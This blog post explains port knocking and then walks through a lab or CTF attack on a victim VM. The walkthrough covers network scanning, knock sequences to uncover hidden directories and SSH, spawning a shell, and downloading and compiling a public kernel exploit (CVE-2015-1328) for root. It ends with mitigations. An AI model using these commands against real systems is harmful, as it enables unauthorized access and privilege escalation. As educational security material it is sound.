PORT Knocking Attack




This blog will explore the ‘nuances’ about Port knocking which is a security method used to protect computer systems from unauthorized access attempts. It involves sending a pre-defined sequence of connection attempts to specific network ports on the server, which will trigger the opening of certain ports for communication. This technique adds an additional layer of security by keeping the ports closed until the correct sequence is received. However, port knocking is not dependable and can be vulnerable to replay and brute-force attacks. It is recommended to use it in combination with other security measures.

What is port knocking?

For information to be passed through a port, said port needs to first be enabled. This is intended as a barrier to malicious activity, but like many other security safeguards, attackers can bypass this minor security measure. Port knocking is what will open up these closed ports and allow information to flow into a previously closed port.

How does port knocking work?

Port knocking works by sending information packets with certain characteristics to a port. These packets of information comprise attempted connections to a predefined selection of closed ports and can include specific strings, unusual flags and other distinctive characteristics.

Once the selection of ports have had these packets sent to them, port opening is normally performed by the organization’s host-based firewall or other comparable custom software. This has been observed to initiate both dynamic opening of listening ports and connections to listening servers on another system.

The different ways to port knock

While all port knocking techniques involve sending signal packets to a port to trigger communication, the methods by which they accomplish this task can be different. One method, exemplified by the malicious program Cd00r, sniffs for the packets by using **libpcap libraries**. Another method enables malware to use open ports used by other programs by leveraging raw sockets. Either method you use, the result is the same — communication can now move through a previously closed port.

Going a step further, there are different types of port knocks. The most commonly used knocks are:

  • Covert knocks : Covert knocks, also known as covert port knocking, is a technique used to conceal the use of port knocking to gain access to a system. This method involves hiding the port knocking sequence within normal network traffic, making it harder to detect and block by network administrators. However, using covert knocks raises security concerns and can potentially lead to unauthorized access if not properly secured.

  • Dynamic knocks : Dynamic knocks is an advanced form of port knocking that generates a new sequence of connection attempts for every login attempt. This makes it more difficult for attackers to guess or intercept the port knocking sequence, thereby improving the security of the system. Dynamic knocks typically require a client-side software to generate the connection attempts, and can be implemented using various programming languages and protocols. However, Dynamic knocks can be more complex to set up and may require additional configuration compared to traditional port knocking methods.

  • One-time knocks : One-time knocks, also known as single-use knocks, is a type of port knocking that generates a unique sequence of connection attempts for each login attempt. Unlike traditional port knocking methods where the same sequence is used repeatedly, one-time knocks generate a new sequence each time, making it more difficult for attackers to guess or intercept the port knocking sequence. One-time knocks can enhance the security of the system by reducing the risk of replay attacks and unauthorized access. However, one-time knocks can also be more complex to set up and may require additional configuration compared to traditional port knocking methods.

Requirements for Demonstrating the Attack:

  1. Kali Linux VM - [Attacker]
  2. Victim VM - [Victim]

Starting the Process: 🪓

1.) Scan your network using the netdiscover command and observe an IP address in the network.Please refer to the POC below:

Fig 1. Scan the network using netdiscover

2.) Enumerate the target through aggressive scan; type following command for nmap scanning:

 nmap -p- -A
Fig 2. Scan the network using Nmap

So here I found only single port 80 is open

3.)Upon discovering that port 80 was open, the browser was opened, and the target IP was navigated to. While browsing the page, a link labeled ‘Woah’ was encountered and promptly clicked.

Fig 3.Woah was accessed by opening the internet and clicking on it.

4.) The hyperlink named ‘Woah’ consists of a file named ‘pcap1.pcap’, which was downloaded to discover a clue.

Fig 4. Download the pcap file

5.) Upon opening the file with Wireshark, it was observed that the VM box attempted to establish connections over TCP ports ‘7000’, ‘8000’, and ‘9000’. However, the attempts made on these ports were ‘discarded’, and some efforts were obstructed with a connection ‘RST’, ‘ACK’. Further analysis revealed that this technique is commonly known as ‘port knocking’.

Fig 5. Launch the file in Wireshark and proceed with further analysis

6.)Send packets to ‘7000’, ‘8000’, ‘9000’ so that these ports sequence will open another port. Therefore type the following command for nmap to perform a Sequential Port Scan:

 nmap -r -p 7000,8000,9000 
Fig 6. Run the Nmap port scannning in the sequence

7.)Utilize the ‘knock’ utility to knock on the specified ports, and use ‘Netcat’ to establish a connection with this port. Upon connecting to this port, it can be observed that a new ‘directory’ on the Web Server has been disclosed.Therefore type the following command to knock the ports:

knock -v 7000 8000 9000 8888 ; nc 7000
Fig 7. Use the knock utility to disclose a new directory

8.) Upon discovering a new directory, the browser was accessed to navigate to ‘’.Then again a new found file ‘pcap2.pcap’, was downloaded promptly.

Fig 8. Downloaded another pcap file.

9.) Once more, I used Wireshark to open the ‘pcap2’ file, but this time I was unable to locate any port knocking sequence. As a result, I picked a packet at random and followed its ‘TCP stream’ by right-clicking on it and selecting the “follow” option.

Fig 9. Followed the TCP stream using Wireshark

10.) Capturing the TCP stream revealed an image that points towards another clue. The message is: ‘Can you understand my message?!’.

Fig 10. Observe the highlighted message.

11.) The message was written in ‘German’, and upon translation, it read ‘one three three seven.’ This could indicate that port 1337 is another potential ‘knocking port’.

Fig 11. Translate the German message in English.

12.) Utilize the ‘knock’ utility to knock on the specified port one more time, and use ‘Netcat’ to establish a connection with this port. Observe that port 1337 get opened which points towards ‘/iamcornholio/’

Fig 12.Use the knock utility on port 1337 to disclose a new directory.

13.) Next, investigate ‘’. During this inspection, a base64-encoded string was discovered. Decoding this string is necessary to progress further..

Fig 13.Observe the Base-64 string.

14.) The string was decoded, revealing another port knocking sequence.To decode the string use the following command

echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
Fig 14. Decoded string reveals port knocking sequence.

15.) The previous port knocking technique was leveraged.

knock -v 8888 9999 7777 6666; ssh
Fig 15. Using the knock method and ssh to the target.

16.) Logging in using the ‘disclosed credentials’ worked, but the session closed almost immediately.

Fig 16. Logging in using the given credentials.

17.) The following command was executed, successfully spawning a shell on the target:

knock -v 8888 9999 7777 6666; ssh [email protected] "/bin/sh"
Fig 17. Spwan a shell on the target.

18.) After logging in successfully, the kernel version was identified as 3.13.0, reading the ‘nachos’ file which reveals ‘Obtained a lower shell; the objective is to attain root access’. Commands used:

uname -a
cat nachos
Fig 18. Observe the kernal version and string of the file nachos.

19.) The kernal version revealed susceptibility to ‘CVE-2015-1328’, enabling local privilege escalation through overlay mounts in user namespaces. Exploiting this flaw could result in administrative privileges and facilitate capturing the flag.Commands used:

wget https://www.exploit-db.com/download/37292
mv 37292 priv.c
gcc priv.c -o priv
cd /root
Fig 19. Successfully able to get the root user access.


To prevent the Port Knocking from being exploited, we can do the below mitigations:

  • Implement secure and complex knock sequences
  • Use multi-factor authentication
  • Enforce IP restrictions
  • Monitor network traffic for suspicious behavior
  • Implement a VPN or firewall rules that only allow authorized IP addresses to access specific ports



~ Kartik

Last_updated 12-03-2023